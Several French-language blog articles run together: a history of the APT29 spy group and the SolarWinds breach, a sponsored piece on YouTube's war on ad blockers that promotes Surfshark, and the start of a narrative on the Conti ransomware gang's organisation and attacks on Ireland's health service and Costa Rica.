Et puis arrive l’attaque SolarWinds fin 2020. Là, c’est le chef-d’œuvre absolu d’APT29, leur opération la plus ambitieuse et la plus réussie. L’idée est géniale et diabolique car au lieu d’attaquer directement des milliers de cibles, pourquoi ne pas simplement compromettre un fournisseur que tout le monde utilise ?

Du coup, ils ciblent SolarWinds, dont le logiciel Orion est utilisé pour la gestion de réseau par des milliers d’entreprises et d’agences gouvernementales. Entre septembre 2019 et février 2020, APT29 infiltre alors l’environnement de développement de SolarWinds et y injectent leur malware, SUNBURST (aussi appelé Solorigate), directement dans les mises à jour légitimes du logiciel. Malin l’ourson !!

SolarWinds, la supply chain compromise qui a secoué le monde

Entre mars et juin 2020, environ 18 000 clients SolarWinds téléchargent et installent la mise à jour compromise. Le malware SUNBURST s’active après une période de dormance de 12 à 14 jours, histoire d’éviter la détection par les sandboxes de sécurité et il contacte ses serveurs de commande en imitant parfaitement le trafic légitime de SolarWinds. Il est donc pratiquement invisible.

Mais attendez, APT29 ne s’intéresse pas aux 18 000 victimes. Non non, ils font le tri comme des chefs car environ 1% des infectés seulement sont sélectionnés pour la phase deux de l’opération. Ce sont les cibles de haute valeur telles que des agences gouvernementales américaines, des entreprises technologiques majeures, des think tanks influents…etc. Et pour les autres, SUNBURST reste dormant ou s’autodétruit.

La liste des victimes confirmées est impressionnante. Le Département du Trésor, le Département du Commerce, le Département de l’Énergie (y compris la National Nuclear Security Administration… oui, ceux qui gèrent l’arsenal nucléaire !), le Département de la Justice… Microsoft, Cisco, Intel, Deloitte, et même FireEye, l’entreprise de cybersécurité qui découvrira l’attaque.

C’est l’ironie du sort car c’est justement FireEye qui tire la sonnette d’alarme le 8 décembre 2020. Ils détectent que leurs propres outils de red team (des outils utilisés pour tester la sécurité) ont été volés. En enquêtant, ils découvrent alors SUNBURST. Kevin Mandia, le CEO de FireEye, déclare que c’est l’attaque la plus sophistiquée qu’il ait jamais vue en 25 ans de carrière, et croyez-moi, le mec en a vu des vertes et des pas mûres !

FireEye, la société de cybersécurité qui a découvert l’attaque SolarWinds

Ce qui impressionne les experts, c’est surtout la patience et la sophistication d’APT29 car ils ont passé des mois, peut-être des années, à planifier cette opé;ration. Ils ont étudié l’architecture de SolarWinds, ils ont trouvé le moyen d’insérer leur code sans déclencher d’alarmes, ils ont créé une infrastructure de commande et contrôle qui imite parfaitement le trafic légitime.

Et une fois dans les réseaux des victimes, APT29 ne se précipite pas. Non, ils explorent méthodiquement, ils identifient les systèmes critiques, ils volent les identifiants administrateurs, et ils installent d’autres backdoors comme TEARDROP et RAINDROP pour garder l’accès même si SUNBURST est découvert.

En janvier 2024, Microsoft annonce une nouvelle intrusion ! Cette fois, APT29 a utilisé une technique vieille comme le monde mais toujours efficace : le password spraying. Ils ont testé des mots de passe communs contre des milliers de comptes jusqu’à trouver un compte de test sans authentification multi-facteurs. Une erreur basique qui a coûté très cher !

Microsoft appelle maintenant APT29 “Midnight Blizzard” ou “NOBELIUM”. C’est poétique, je trouve… le blizzard de minuit, c’est l’attaque qui arrive sans un bruit dans l’obscurité et qui paralyse tout. Ce nouveau nom reflète aussi l’évolution du groupe car ils ne sont plus juste “Cozy Bear”, l’ours douillet. Ils sont devenus une force de la nature, imprévisible et dévastatrice.

Mais le pire, c’est ce que Microsoft révèle en mars 2024… APT29 a eu accès à certains de leurs dépôts de code source pendant l’attaque SolarWinds et le code source de Microsoft, c’est les plans de l’Etoile de la Mort ! Avec ça, APT29 peut chercher des vulnérabilités, comprendre comment fonctionnent les systèmes de sécurité, et peut-être même planifier de futures attaques.

Microsoft, victime récurrente et observateur privilégié d’APT29

Les attaques continuent et se diversifient. En octobre 2024, Microsoft détecte une campagne de spear-phishing massive. APT29 envoie des milliers d’emails à des cibles dans plus de 100 organisations. Les emails contiennent des fichiers RDP (Remote Desktop Protocol) qui, une fois ouverts, connectent la machine de la victime à un serveur contrôlé par APT29. C’est super efficace !

Ce qui est nouveau et assez fou, c’est l’utilisation de Microsoft Teams pour le phishing. APT29 se fait passer pour le support technique et contactent les employés directement via Teams. “Bonjour, on a détecté un problème avec votre compte, pouvez-vous confirmer votre mot de passe ?” Simple, mais terriblement efficace quand c’est bien fait.

Bon, parlons un peu de leur arsenal technique, parce que c’est du lourd. HAMMERTOSS, découvert en 2015, est particulièrement créatif puisqu’il utilise Twitter pour recevoir ses commandes ! Les opérateurs d’APT29 créent des comptes Twitter avec des noms générés algorithmiquement (genre “234Bob234” ou “1abMike52b”) et ils postent des tweets qui semblent innocents mais qui contiennent des instructions encodées et des URLs vers des images contenant des commandes cachées par stéganographie.

En 2023-2024, on voit également apparaître de nouveaux outils comme WINELOADER et SNOWYAMBER. WINELOADER utilise des leurres sur le thème du vin (d’où le nom) pour cibler les diplomates. SNOWYAMBER intègre des routines anti-détection super avancées et peut désactiver les solutions de sécurité avant de s’exécuter. Ces mecs ne s’arrêtent jamais d’innover !

Les techniques de persistence d’APT29 sont aussi impressionnantes. Ils utilisent le DLL Side-Loading, créent des tâches planifiées Windows légitimes, modifient les clés de registre de démarrage, et exploitent même les mécanismes de signature de code de Windows. Bref, une fois qu’ils sont dans votre système, c’est comme essayer d’enlever de la super glue sur vos doigts… bon courage !

Les cibles d’APT29 révèlent leurs priorités stratégiques. Gouvernements occidentaux, particulièrement les ministères des affaires étrangères et de la défense. Cercles de réflexion qui influencent les politiques. Entreprises technologiques qui développent des innovations critiques. Organisations internationales comme l’ONU, l’OTAN ou l’UE. Bref, tout ce qui peut donner à la Russie un avantage stratégique est dans leur viseur.

Mais APT29 ne s’intéresse pas qu’à l’Occident. Ils espionnent aussi les pays de l’ex-URSS, les gouvernements asiatiques, africains et du Moyen-Orient. Ils surveillent même les groupes d’opposition russes et les oligarques qui pourraient poser problème. Le SVR veut tout savoir, tout contrôler. C’est Big Brother version cyber !

L’ONU, une des nombreuses organisations internationales ciblées

Comme je vous le disais, la patience d’APT29 est vraiment légendaire car dans certains cas documentés, ils sont restés dans des réseaux pendant plus de cinq ans sans être détectés. Cinq ans ! Ils observent, ils apprennent les habitudes, ils comprennent l’organisation et quand ils frappent enfin, ils savent exactement où chercher et quoi prendre.

Cette approche “low and slow” (basse et lente) est typique du SVR. Contrairement au GRU qui fait dans le spectaculaire et le perturbateur (coucou NotPetya !), le SVR privilégie le renseignement à long terme car ils veulent comprendre les intentions, anticiper les décisions, influencer subtilement plutôt que détruire brutalement.

C’est pourquoi les experts en cybersécurité ont un respect mêlé de crainte pour APT29. John Hultquist de Mandiant les décrit comme “les meilleurs dans le domaine”. Dmitri Alperovitch de CrowdStrike dit qu’ils sont “extrêmement disciplinés et professionnels”. Ce ne sont pas des script kiddies ou des hacktivistes. Ce sont des professionnels du renseignement avec des moyens illimités et 20 ans d’expérience.

Notez quand même que le coût humain et financier des opérations d’APT29 est astronomique. Les dommages directs se chiffrent en milliards, notamment avec le coût de la remédiation après SolarWinds qui dépasse les 100 milliards de dollars selon certaines estimations. Mais le vrai coût, c’est la perte de confiance, les secrets volés, l’avantage stratégique donné à la Russie. Et comment chiffrer ça ?

Et le pire dans tout ça, c’est qu’on ne sait probablement pas tout car APT29 est si doué pour rester invisible qu’il y a certainement des intrusions non découvertes. Combien de réseaux sont encore compromis ? Quels secrets ont été volés sans que personne ne s’en aperçoive ? C’est ça le vrai cauchemar qui empêche les RSSI du monde entier de dormir.

Mais l’attribution d’APT29 au SVR est maintenant officielle. En avril 2021, les États-Unis, le Royaume-Uni, l’Australie, le Canada, la Nouvelle-Zélande, l’OTAN et l’UE l’ont même confirmé publiquement, mais bon, ça change quoi concrètement ? Les membres d’APT29 ne seront jamais extradés, jamais jugés et ils continueront leur travail, protégés par l’État russe.

Le SVR a surtout une longue histoire d’espionnage derrière lui… C’est l’héritier de la Première Direction principale du KGB, responsable du renseignement extérieur. Des légendes comme Kim Philby, Guy Burgess et Donald Maclean (les fameux espions de Cambridge) travaillaient pour les prédécesseurs du SVR. APT29 est donc la continuation de cette tradition avec des moyens modernes. Les méthodes changent mais les objectifs restent les mêmes.

Le SVR, héritier du KGB et commanditaire d’APT29

Ce qui est dingue, je trouve, c’est la normalisation de ces attaques car il y a 20 ans, pirater la Maison Blanche aurait été considéré comme un acte de guerre. Aujourd’hui, c’est juste un mardi comme les autres. Les pays occidentaux dénoncent, imposent des sanctions, expulsent des diplomates, mais les attaques continuent. C’est une nouvelle normalité de la guerre froide numérique.

Cependant, les leçons à tirer de l’affaire APT29 sont multiples et cruciales. D’abord, la cybersécurité n’est jamais acquise. Même les organisations les plus sophistiquées peuvent être compromises. Ensuite, la supply chain est le maillon faible. SolarWinds l’a montré de manière spectaculaire : compromettre un fournisseur, c’est potentiellement compromettre des milliers de clients.

L’importance du renseignement humain reste également évidente car sans les Néerlandais et leurs caméras, on n’aurait jamais eu cette vision unique des opérations d’APT29. Sans oublier la coopération internationale qui est absolument cruciale dans ce genre de cas. Les Néerlandais ont aidé les Américains, qui ont aidé les Britanniques, qui ont aidé tout le monde… Face à des adversaires étatiques avec des ressources illimitées, les démocraties doivent s’entraider, mais cette coopération est fragile, comme l’a montré la fin prématurée de l’accès néerlandais.

Et pour les entreprises et les organisations, le message est clair : Vous êtes peut-être déjà compromis car APT29 est patient, très patient… et ils peuvent déjà être dans vos systèmes depuis des années. Une approche “assume breach” (supposez que vous êtes compromis) est donc plus réaliste qu’une approche “empêcher toute intrusion”.

L’authentification multi-facteurs, le principe du moindre privilège, la segmentation réseau, la surveillance comportementale, les EDR/XDR… Toutes ces mesures sont essentielles, mais même avec tout ça, APT29 peut trouver un moyen d’accéder à vos systèmes.

Sans oublier que APT29 continue inexorablement de s’adapter, d’apprendre de leurs erreurs, et d’intégrer de nouvelles techniques à leurs process. L’intelligence artificielle, le machine learning, l’informatique quantique… Toutes ces technologies seront probablement dans leur arsenal dans les années à venir et ce futur s’annonce aussi passionnant que terrifiant ^^.

Certains experts prédisent que la prochaine grande vague d’attaques d’APT29 visera massivement l’infrastructure cloud car avec de plus en plus d’organisations qui migrent sur AWS, Azure ou Google Cloud, c’est la cible logique. Imaginez APT29 avec un accès root aux infrastructures cloud de milliers d’entreprises. Le potentiel de chaos serait vertigineux !

D’autres s’inquiètent également des deepfakes et de la désinformation assistée par IA. APT29 a les compétences techniques et les ressources pour créer des deepfakes ultra-convaincants alors imaginez de fausses vidéos de leaders mondiaux déclarant la guerre, de PDG annonçant des faillites, ou de responsables politiques dans des situations compromettantes. Encore un potentiel énorme de chaos.

Et surtout, comment répondre efficacement à APT29 ??? Car les sanctions économiques et les dénonciations publiques n’ont visiblement aucun effet sur eux. Certains proposent des cyber-ripostes offensives, mais ce serait l’escalade assurée avec un adversaire qui a l’arme nucléaire. D’autres voudraient aussi négocier des “règles du jeu” dans le cyberespace, mais la Russie n’est clairement pas intéressée.

Quoiqu’il en soit, APT29 est à la fois un problème de sécurité nationale et un problème de sécurité individuelle car leurs opérations affectent la géopolitique mondiale, les élections, les relations internationales, mais aussi la vie privée de millions de personnes lambda. Les emails dans le hack du DNC, les données médicales dans le hack de SolarWinds, vos infos perso dans celui de Microsoft… Nous sommes tous des victimes collatérales potentielles.

Surtout que l’histoire d’APT29 est loin d’être finie car tant que le SVR existera et tant que la Russie verra l’Occident comme un adversaire existentiel, les opérations continueront…

Bref, dormez tranquilles braves gens, APT29 veille sur vos données ! 😅

Sources : Wikipedia - Cozy Bear, MITRE ATT&CK - APT29, CISA - APT29 Advisory, Microsoft - NOBELIUM Analysis, FireEye - SUNBURST Analysis, Volkskrant - Dutch Intelligence Operation, Kaspersky - CozyDuke Analysis, Mandiant - UNC2452/APT29 Merge

Depuis ses débuts, YouTube a été le terrain de jeu favori des créateurs, des viewers… et des publicitaires. Mais à mesure que les pubs se sont multipliées, les internautes ont sorti la boîte à outils : bloqueurs de pubs, scripts maison, applis alternatives. Rien de très grave pendant des années, mais depuis 2023, la plateforme vidéo a décidé de sortir l’artillerie lourde. Ce qui n’était qu’une escarmouche est devenu une vraie guerre de tranchées, avec des offensives, des contre-attaques, et des dégâts collatéraux.

2023 : les premiers coups de semonce

Fin 2023, YouTube passe à l’offensive et commence à afficher des avertissements aux utilisateurs d’ad-blockers. Un message s’incruste sur la vidéo : “Ad blockers violate YouTube’s Terms of Service.” Pour continuer, il faut désactiver le bloqueur ou passer à YouTube Premium. Au début, la mesure ne touche qu’une poignée d’utilisateurs, mais la riposte s’organise côté adblockers, qui adaptent leurs filtres pour masquer ce message.

En novembre, YouTube élargit la portée de sa campagne anti-adblockers à l’échelle mondiale. Les utilisateurs se retrouvent face à des vidéos qui refusent de se lancer, des pop-ups persistants, et des ralentissements artificiels du site. Les forums et réseaux sociaux s’enflamment, chacun cherchant la parade du moment.

2024 : La guerre totale

Début 2024, YouTube affine sa stratégie et use la lenteur comme arme psychologique. Plutôt que de bloquer frontalement, la plateforme introduit des ralentissements ciblés. Les vidéos mettent des plombes à charger, les miniatures refusent de s’afficher, le site devient “malade” dès qu’un adblocker est détecté. Officiellement, il s’agit d’une “expérience de visionnage sous-optimale”. Les utilisateurs, excédés, commencent à désinstaller leurs bloqueurs pubs par centaines de milliers, mais d’autres cherchent des alternatives ou migrent vers des navigateurs moins exposés.

Au printemps, YouTube s’attaque aux applications mobiles tierces qui intègrent un bloqueur de pubs. Les apps comme Vanced, NewPipe ou les fork alternatifs voient leur accès restreint, voire bloqué. Si l’appli ne respecte pas les conditions d’utilisation de l’API, c’est rideau : “The following content is not available on this app”. La manœuvre vise à couper l’herbe sous le pied des solutions qui permettaient encore de regarder YouTube sans pub sur mobile.

Comme toujours, les développeurs d’adblockers ne restent pas inactifs. Chaque nouvelle parade de YouTube est contournée par une mise à jour de filtre, un script, ou une astuce communautaire. Mais la fenêtre de répit se réduit à chaque fois : les correctifs ne tiennent parfois que quelques jours avant d’être à nouveau contournés par Google. Les utilisateurs s’adaptent, jonglent entre navigateurs, extensions, et méthodes alternatives.

2025 : YouTube sort le bazooka

En juin 2025, YouTube déploie une nouvelle salve technique. Les principaux anti-pubs voient leurs astuces neutralisées. Le site détecte désormais toute tentative de blocage d’annonces, que ce soit via extension ou application tierce, et réagit par différents moyens : parfois la vidéo ne démarre pas, parfois elle met cinq secondes à charger, parfois un message d’avertissement s’affiche. Ce n’est donc plus un blocage pur et simple, mais une expérience volontairement dégradée, avec des ralentissements ou des délais avant le lancement de la vidéo.

Les exceptions qui confirment la règle

Mais dans ce chaos, deux solutions tirent leur épingle du jeu. D’abord, la solution CleanWeb de Surfshark : malgré tous les efforts de Google, CleanWeb continue de bloquer efficacement les pubs sur YouTube, aussi bien sur navigateur que sur mobile, là où la plupart des autres bloqueurs sont mis en échec. Les tests menés en 2025 confirment que CleanWeb reste opérationnel pour filtrer les pubs Google et offrir une expérience fluide, sans ralentissement ni pop-up d’avertissement.

Autre survivant de la purge : le navigateur Brave. Grâce à son bloqueur de pubs intégré et à des mises à jour régulières, Brave parvient encore à bloquer les pubs sur YouTube, sans déclencher systématiquement les messages d’erreur ou les ralentissements imposés par Google.

Les conséquences : désinstallations massives et migration

Face à l’impasse, de nombreux utilisateurs abandonnent leurs adblockers. Les statistiques explosent : AdGuard, Ghostery, et consorts enregistrent des pics de désinstallations jamais vus, parfois plus de 50 000 en une seule journée. D’autres, lassés, finissent par céder à YouTube Premium, tandis qu’une minorité continue la résistance en cherchant des solutions temporaires ou en changeant de plateforme.

Les arguments de chaque camp

YouTube : “La pub, c’est la vie (de la plateforme)”. Pour Google, la justification est simple : la pub finance la plateforme et rémunère les créateurs. Pas de pub, pas de YouTube gratuit. L’entreprise martèle que les bloqueurs de pubs mettent en péril l’écosystème, et que l’alternative existe : payer pour YouTube Premium.

Les utilisateurs : “Trop, c’est trop”. De l’autre côté, la grogne monte. Les pubs sont jugées trop longues, trop intrusives, parfois même dangereuses (scams, malwares, etc.). Beaucoup dénoncent une expérience dégradée, l’impression d’être pris en otage, et le sentiment que la plateforme pousse à l’abonnement Premium par la contrainte plus que par la qualité du service.

Un bras de fer sans vainqueur ?

La guerre entre YouTube et les adblockers ressemble à une partie d’échecs sans fin. Chaque offensive de Google est suivie d’une contre-attaque des développeurs d’adblockers, mais la plateforme semble désormais avoir l’avantage technologique, surtout grâce à l’intégration des pubs côté serveur et à la fermeture des API tierces. La résistance continue, mais les fenêtres de tir se réduisent. Les utilisateurs doivent choisir : accepter les pubs, payer l’abonnement, migrer vers des alternatives… ou s’équiper d’outils comme CleanWeb ou Brave qui, à ce jour, restent les solutions les plus efficaces pour retrouver un YouTube sans pubs. Pour combien de temps, cela reste à voir.

Et maintenant ?

YouTube a remporté une manche, mais la guerre n’est jamais vraiment finie sur Internet. Les utilisateurs continueront de chercher des moyens de reprendre la main sur leur expérience, que ce soit via de nouveaux outils, des alternatives ou des changements d’habitude. Mais la question de fond demeure : jusqu’où une plateforme peut-elle aller pour imposer la pub, et à quel prix pour la liberté de ses utilisateurs ?

Pour celles et ceux qui veulent la tranquillité numérique sans multiplier les abonnements et les extensions, Surfshark propose donc une formule complète qui va bien au-delà du simple VPN. Avec un seul abonnement, vous bénéficiez non seulement d’un VPN rapide et fiable pour sécuriser vos connexions et contourner les censures, mais aussi de CleanWeb, ainsi que d’Alternative ID, un outil malin pour générer des identités virtuelles et éviter que vos vraies infos ne se baladent dans les bases de données des marketeurs ou des hackers. Tout cela à partir de 2.38€/mois TTC (abonnement 2 ans + 3 mois offert).

En résumé, un seul abonnement Surfshark, et vous profitez d’une navigation privée, sans pubs, sans tracking, sans censure et avec une couche supplémentaire d’anonymat pour toutes vos inscriptions en ligne. Le tout, sur un nombre illimité d’appareils, pour protéger toute la famille sans prise de tête. De quoi préparer la fin des vacances et la rentrée scolaire en toute décontraction du slip.

Cet article fait partie de ma série de l’été spécial hackers. Bonne lecture !

Installez vous confortablement car cet article va être un peu long… Normal, il raconte l’histoire complètement dingue d’un gang de cybercriminels qui a littéralement fait muter un simple ransomware en startup façon Silicon Valley.

Conti, c’est l’histoire d’une organisation criminelle russe qui a généré 180 millions de dollars rien qu’en 2021, qui payait ses hackers avec des fiches de paie et des programmes “employé du mois” (si si, je vous jure), et qui s’est complètement vautrée après avoir choisi le mauvais camp dans la guerre contre l’Ukraine.

Bref, du jamais vu dans l’histoire du cybercrime !

L’écran de la mort version 2020 ou quand vos fichiers deviennent otages

Tout commence donc fin 2019, quelque part dans les bas-fonds numériques de Saint-Pétersbourg où un groupe de cybercriminels russes, déjà bien connus sous le nom de Wizard Spider (oui, “l’araignée magicienne”, ils ont pas cherché loin), décide qu’il est temps de passer à la vitesse supérieure.

Et ce ne sont pas des débutants, non, non, car depuis 2016, ils sont déjà derrière Ryuk, un ransomware qui a déjà rapporté la bagatelle de 150 millions de dollars et surtout TrickBot, l’un des botnets les plus vicieux au monde avec plus d’un million de machines infectées. Ce malware bancaire ultra-sophistiqué s’infiltre via des campagnes de phishing massives, vole vos identifiants bancaires, cartographie l’intégralité de votre infrastructure réseau, identifie les machines critiques, et prépare le terrain pour le déploiement du ransomware.

Mais avec Conti, ils veulent carrément industrialiser le crime.

Saint-Pétersbourg : ville des tsars, de Dostoïevski… et des cybercriminels millionnaires

Alors fin 2019, ils ont une super idée pour des criminels : Pourquoi se contenter d’attaques ponctuelles quand on peut créer le McDonald’s du ransomware avec des franchises ? C’est là que naît Conti et le principe est simple : transformer le ransomware en service (RaaS - Ransomware as a Service) comme ça au lieu de tout faire eux-mêmes comme des artisans à l’ancienne, ils vont recruter une armée d’affiliés qui feront le sale boulot de terrain, et tout le monde se partagera les bénéfices. C’est l’uberisation du crime, version russe.

Sauf que Conti va beaucoup plus loin que tous les autres gangs de ransomware car là où la plupart des groupes fonctionnent sur un modèle de commission classique (l’affilié garde 70-80% de la rançon, le reste va aux développeurs), Conti innove complètement puisqu’ils paient leurs affiliés avec un salaire fixe mensuel. Oui, un vrai salaire, avec des fiches de paie, des augmentations annuelles, et même des bonus de performance pour les meilleurs éléments. C’est la première fois dans l’histoire du cybercrime qu’on voit ça.

Et les documents qui ont fuité en 2022 (les fameux Contileaks, j’y reviendrais plus tard…) révèlent ainsi une organisation qui dépasse l’entendement. Des chasseurs de têtes russes parfaitement légitimes sont utilisés pour recruter de nouveaux “employés” sur des sites comme HeadHunter.ru (l’équivalent russe de LinkedIn). Les candidats passent des entretiens d’embauche en bonne et due forme, avec tests techniques et tout le tralala. Ils signent même des contrats (bon, évidemment pas super légaux) et intègrent des équipes ultra-spécialisées. Y’a l’équipe “pentest” qui s’infiltre dans les réseaux, l’équipe “crypto” qui gère les paiements Bitcoin et le blanchiment, l’équipe “négociation” qui discute avec les victimes, l’équipe “dev” qui améliore le ransomware, l’équipe “support” qui aide les affiliés en difficulté…

Ils ont même mis en place un programme “employé du mois” avec photo sur le mur virtuel et tout. Les meilleurs performers reçoivent ainsi des bonus en Bitcoin (entre 5 000 et 50 000 dollars selon les performances), des félicitations publiques sur leur chat interne Jabber, et des opportunités de “promotion”. Un hacker particulièrement doué peut ainsi gravir les échelons, et passer de simple “pentester” junior, à senior, puis à “team lead” avec une équipe de 5-10 personnes sous ses ordres, et enfin à “department head” avec des responsabilités stratégiques. C’est un crossover entre LinkedIn et Le Parrain.

Organigramme type d’un gang moderne - Source

Les salaires révélés dans les fuites donnent le vertige. Un débutant touche environ 1 500 à 2 000 dollars par mois (ce qui est très correct en Russie où le salaire moyen tourne autour de 700 dollars). Un expert confirmé peut monter jusqu’à 10 000 dollars mensuels. Les team leads touchent entre 15 000 et 20 000 dollars. Et les top managers ? On parle de 50 000 dollars par mois et plus. Tout ça payé en Bitcoin évidemment, via des mixers et des échanges décentralisés pour brouiller les pistes. Certains touchent même des “stock options” sous forme de pourcentage sur les futures rançons. Du jamais vu.

Le Bitcoin : la monnaie officielle du crime organisé 2.0

Maintenant, parlons du big boss de cette organisation criminelle 2.0 : Vitaly Nikolaevich Kovalev, 36 ans au moment des faits, connu sous une ribambelle de pseudos tels que “Stern” (son préféré), “Demon”, “Ben”, “Bergen”, “Vitalik K”, ou encore “Alex Konor”. Ce type est littéralement un fantôme numérique car pendant des années, absolument personne ne savait qui se cachait derrière ces pseudos. Même ses plus proches “collaborateurs” ne connaissaient que sa voix sur les chats vocaux chiffrés. Il dirigeait TrickBot et Conti depuis l’ombre, accumulant une fortune estimée par les autorités allemandes à plus de 500 millions de dollars en crypto. Un demi-milliard, vous vous rendez compte ?

Et Kovalev n’est vraiment pas votre hacker cliché en sweat à capuche. C’est un pur businessman du crime, un Steve Jobs du ransomware. Il a compris avant tout le monde que le cybercrime pouvait être organisé exactement comme une entreprise légitime du Fortune 500. Sous sa direction, Wizard Spider est ainski passé d’un petit groupe de hackers russes lambda à une organisation de plus de 150 membres permanents, avec des départements, des process ISO-compliant (j’exagère à peine), des KPIs, des dashboards de performance en temps réel, et même une charte d’entreprise (qui incluait bizarrement un code de conduite éthique, allez comprendre).

Vitaly Nikolaevich Kovalev alias Stern

Alors concrètement, comment fonctionne une attaque type de Conti ? Vous allez voir, c’est du grand art criminel, une chorégraphie millimétrée.

Phase 1 : l’infection initiale. Soit via TrickBot (leur botnet historique), soit via BazarLoader (la version 2.0), soit carrément via des campagnes BazarCall où des call centers indiens appellent les victimes en se faisant passer pour Microsoft. “Bonjour, nous avons détecté un virus sur votre ordinateur, laissez-nous vous aider.” Vous connaissez, c’est classique mais ça marche encore.

Une fois TrickBot installé, le malware fait son boulot de reconnaissance. Il mappe le réseau avec la précision d’un chirurgien : identification des contrôleurs de domaine, des serveurs de sauvegarde, des bases de données critiques, des partages réseau, des comptes à privilèges. Cette phase peut durer des semaines, voire des mois. Les hackers sont patients, méthodiques. Ils utilisent des outils légitimes comme ADFind ou SharpView pour passer sous les radars. Tout est documenté dans des rapports détaillés envoyés à l’équipe d’analyse.

Phase 2 : l’escalade de privilèges et le mouvement latéral. C’est là que Cobalt Strike entre en jeu. Ah, Cobalt Strike… Initialement un outil légitime de pentest à 3 500 dollars la licence, devenu l’arme préférée des cybercriminels. Les versions crackées circulent sur tous les forums underground russes. Conti utilise des configurations custom avec des profils de communication qui imitent le trafic légitime de Google ou Microsoft, leur donnant un contrôle total : exécution de commandes, keylogging, captures d’écran, pivoting, tout y passe.

Et les hackers désactivent méthodiquement toutes les défenses. Windows Defender ? Désactivé via GPO. EDR d’entreprise ? Contourné ou carrément supprimé. Sauvegardes ? Effacées ou chiffrées en premier. Ils utilisent même des techniques d’évasion ultra-sophistiquées : injection de processus, DLL hollowing, obfuscation PowerShell…

Phase 3 : le déploiement du ransomware. Et là, c’est du brutal car Conti est programmé pour chiffrer un maximum de données en un minimum de temps. On parle de 32 threads parallèles qui tournent à plein régime, capable de chiffrer 100 000 fichiers en moins de 10 minutes. Et l’algorithme, c’est du solide : AES-256 pour les fichiers (avec une clé unique par fichier), puis RSA-4096 pour chiffrer les clés AES. Mathématiquement incassable sans la clé privée. Les versions récentes sont passées à ChaCha20 pour gagner encore en vitesse et ainsi, en quelques heures, parfois minutes sur les petits réseaux, tout le système d’information d’une entreprise est foutu.

Mais Conti ne se contente pas de chiffrer vos données. Non non, ce serait trop simple. Avant de lancer le ransomware, ils exfiltrent des téraoctets d’informations sensibles via rclone ou MegaSync. Contrats, données clients, secrets industriels, emails compromettants, tout y passe. Comme ça, si la victime refuse de payer, ils menacent de publier ces données sur leur site “Conti News”, accessible uniquement via Tor. C’est ce qu’on appelle la “double extorsion” : vous payez pour récupérer vos données ET pour éviter qu’elles soient publiées. Certaines victimes ont même subi une “triple extorsion” avec des attaques DDoS en prime si elles traînent trop.

Double extorsion : Si vous ne payez pas, vos données finissent ici (ou pas si elles ont été vendues)

Et les montants des rançons donnent le tournis. En moyenne, Conti demande entre 500 000 et 5 millions de dollars, avec une médiane autour de 800 000 dollars. Mais pour les grosses entreprises ou les gouvernements, ça peut monter beaucoup, beaucoup plus haut. Le Costa Rica s’est par exemple vu réclamer 10 millions initialement, puis 20 millions quand ils ont refusé. Certaines multinationales auraient même payé des rançons à huit chiffres… je vous parle de 20, 30, voire 40 millions de dollars. La plus grosse rançon confirmée est de 34 millions de dollars payés par une compagnie d’assurance américaine (dont le nom n’a jamais fuité).

Le “département négociation” de Conti, c’est aussi du grand art en matière de manipulation psychologique. Des négociateurs sont formés aux techniques de persuasion avancées… Ils alternent menaces voilées et fausse empathie, jouent sur l’urgence ("chaque jour de retard coûte 100 000 dollars supplémentaires"), proposent des “réductions” pour paiement rapide ("payez dans les 48h et on vous fait 40% de remise, offre limitée !"). Certains se font même passer pour des “consultants indépendants en cybersécurité” qui peuvent “aider” la victime à sortir de cette situation délicate. Ils fournissent même des tutoriels détaillés pour acheter des bitcoins, c’est dire le niveau de “service client”.

Et les victimes de Conti, c’est un who’s who du malheur numérique… Hôpitaux, universités, municipalités, entreprises du CAC 40… Personne n’est épargné. J’en veux pour preuve l’attaque contre le Health Service Executive (HSE) irlandais en mai 2021 qui restera dans les annales avec 80% du système informatique du service de santé national irlandais paralysé du jour au lendemain. 54 des 58 hôpitaux existants ont été touchés. Les médecins obligés de revenir au papier et au stylo, les IRM et scanners hors service, les dossiers patients inaccessibles, des opérations chirurgicales reportées, des chimiothérapies retardées, des ambulances détournées. Bref, un chaos total qui a duré des semaines.

Et le coût total pour l’Irlande ? Plus de 100 millions d’euros en dommages directs, et potentiellement 600 millions en incluant la remédiation et le renforcement de la sécurité. Et tout ça pourquoi ? Parce que le HSE a courageusement refusé de payer les 20 millions de dollars de rançon demandés. Respect pour le principe, mais la facture finale a fait mal. Très mal.

Et des mois après l’attaque, certains systèmes n’étaient toujours pas restaurés.

Quand les ransomwares s’attaquent aux hôpitaux, ce sont des vies qui sont en jeu

Mais l’attaque la plus spectaculaire, celle qui restera dans les livres d’histoire, c’est l’assaut contre le Costa Rica en avril-mai 2022 dont je vous parlais juste avant. Le 17 avril, premier coup de semonce : le ministère des Finances costaricain est frappé. Les systèmes de déclaration d’impôts et de douanes sont KO. Puis c’est l’escalade… ministère du Travail le 27 avril, puis Sécurité sociale, Sciences et Technologies, Fonds de développement social… Et en quelques semaines, c’est 27 institutions gouvernementales qui sont touchées, dont 9 complètement paralysées. Le pays ne peut littéralement plus fonctionner.

Face à cette cyberattaque d’une ampleur sans précédent, le président Rodrigo Chaves n’a alors pas d’autres choix et le 8 mai 2022, il fait une déclaration historique : État d’urgence national pour cause de cyberattaque. C’est la première fois dans l’histoire de l’humanité qu’un pays entier se retrouve en état d’urgence à cause de hackers. L’économie est paralysée, les exportations bloquées (le Costa Rica exporte pour 12 milliards de dollars par an), et les services publics à l’arrêt complet. Les experts estiment que chaque jour de crise coûte 30 à 38 millions de dollars au pays et en 3 semaines, cela représente près d’un milliard de dollars de pertes.

Costa Rica : première nation victime d’une cyber-guerre déclarée

Mais Conti ne s’arrête pas là. Dans un délire mégalomaniaque total, ils appellent carrément au renversement du gouvernement costaricain ! Sur leur site accessible via Tor, ils publient ceci : “Nous avons décidé de renverser le gouvernement par cyberattaque, nous avons nos raisons. Nous demandons aux citoyens du Costa Rica de faire pression sur leur gouvernement, sinon nous continuerons nos attaques.” Du jamais vu. Un gang de ransomware qui se prend pour une force révolutionnaire et menace la stabilité d’un État souverain. On n’est plus dans le cybercrime, on est dans le cyberterrorisme d’État.

La réaction internationale est alors immédiate. Le Département d’État américain sort l’artillerie lourde avec 15 millions de dollars de récompense : 10 millions pour des informations sur l’identité et la localisation des leaders de Conti, 5 millions supplémentaires pour toute info menant à des arrestations. C’est la plus grosse prime jamais offerte pour des cybercriminels, dépassant même certaines primes pour des terroristes. Le FBI mobilise des dizaines d’agents, Interpol émet des notices rouges, bref c’est une énorme chasse à l’homme qui démarre.

10 millions de dollars - Quand ta tête vaut plus cher qu’un yacht de luxe

